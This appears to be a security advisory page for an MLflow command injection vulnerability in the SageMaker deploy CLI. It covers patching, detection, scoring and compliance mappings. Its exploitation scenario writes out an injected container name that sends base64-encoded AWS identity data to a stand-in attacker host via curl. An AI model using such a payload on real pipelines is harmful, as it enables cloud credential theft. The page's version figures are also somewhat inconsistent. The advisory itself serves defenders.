CVE-2025-14287 — HIGH (CVSS 7.5) AI Security Vulnerability

Q: Is CVE-2025-14287 actively exploited?

No confirmed active exploitation of CVE-2025-14287 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2025-14287?

1) PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation. 2) DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter. 3) WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+ $). 4) HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment. 5) AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.

Q: What systems are affected by CVE-2025-14287?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms (MLflow-based), CI/CD pipelines for ML, Cloud ML deployments (AWS SageMaker), Model serving infrastructure, Training and deployment pipelines.

Q: What is the CVSS score for CVE-2025-14287?

CVE-2025-14287 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 0.29%.

CISO Take

MLflow users on any version before 3.7.0 deploying to AWS SageMaker are exposed to command injection via unsanitized container image names passed to os.system(). Patch immediately to v3.7.0+ and audit CI/CD pipelines that accept external input for the --container parameter. Until patched, restrict who can invoke MLflow SageMaker CLI commands and treat any container name input from untrusted sources as hostile.

Risk Assessment

HIGH risk despite absent CVSS score. Command injection via os.system() is a well-understood, reliable attack primitive — exploitation requires no special skills. The attack surface is broad: MLflow is pervasive in MLOps pipelines, and the vulnerable code path (SageMaker deployment) is a common production workflow. CI/CD pipelines that dynamically construct container image names from external sources (Git tags, webhook payloads, PR metadata) are the highest-risk targets. Privileges escalated depend on the process context — in containerized CI environments, impact is potentially full host compromise if combined with container escape.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
mlflow	pip	< 3.8.0rc0	`3.8.0rc0`
25.7K OpenSSF 4.5 624 dependents Pushed 7d ago 24% patched ~64d to patch Full package profile →

Do you use mlflow? You're affected.

Severity & Risk

CVSS 3.1

7.5 / 10

EPSS

0.3%

chance of exploitation in 30 days

Higher than 53% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Advanced

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC High

PR None

UI Required

S Unchanged

C High

I High

A High

Recommended Action

1 step

1) PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation. 2) DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter. 3) WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+ $). 4) HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment. 5) AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Supply Chain Model Poisoning Code Execution Framework Model AML.T0010.001 - AI Software AML.T0010.004 - Container Registry AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0055 - Unsecured Credentials AML.T0105 - Escape to Host

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

8.2 - AI risk assessment 8.4 - AI system operation and monitoring A.6.2.6 - Security of AI system

NIST AI RMF

GOVERN-1.7 - Organizational teams are committed to a culture that considers and communicates AI risk MANAGE 2.2 - Mechanisms for tracking and managing AI risks MANAGE-2.2 - Mechanisms to sustain the value of deployed AI with ongoing maintenance

OWASP LLM Top 10

LLM05:2025 - Supply Chain Vulnerabilities LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-14287?

MLflow users on any version before 3.7.0 deploying to AWS SageMaker are exposed to command injection via unsanitized container image names passed to os.system(). Patch immediately to v3.7.0+ and audit CI/CD pipelines that accept external input for the --container parameter. Until patched, restrict who can invoke MLflow SageMaker CLI commands and treat any container name input from untrusted sources as hostile.

Is CVE-2025-14287 actively exploited?

No confirmed active exploitation of CVE-2025-14287 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-14287?

1) PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation. 2) DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter. 3) WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+ $). 4) HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment. 5) AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.

What systems are affected by CVE-2025-14287?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms (MLflow-based), CI/CD pipelines for ML, Cloud ML deployments (AWS SageMaker), Model serving infrastructure, Training and deployment pipelines.

What is the CVSS score for CVE-2025-14287?

CVE-2025-14287 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 0.29%.

Technical Details

NVD Description

A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments.

Exploitation Scenario

An adversary with write access to a Git repository (via compromised developer credentials or a malicious PR) modifies the CI/CD pipeline configuration to pass a crafted container image name such as legitimate-image:latest; curl -s http://attacker.com/$(aws sts get-caller-identity | base64) to the MLflow SageMaker deployment command. When the pipeline triggers, MLflow interpolates the unsanitized string directly into an os.system() call, executing the injected command in the context of the CI runner. The attacker receives AWS caller identity (credentials), then uses them to access S3 model buckets, enumerate SageMaker endpoints, and exfiltrate or replace production model artifacts. No user interaction beyond the normal pipeline execution is required.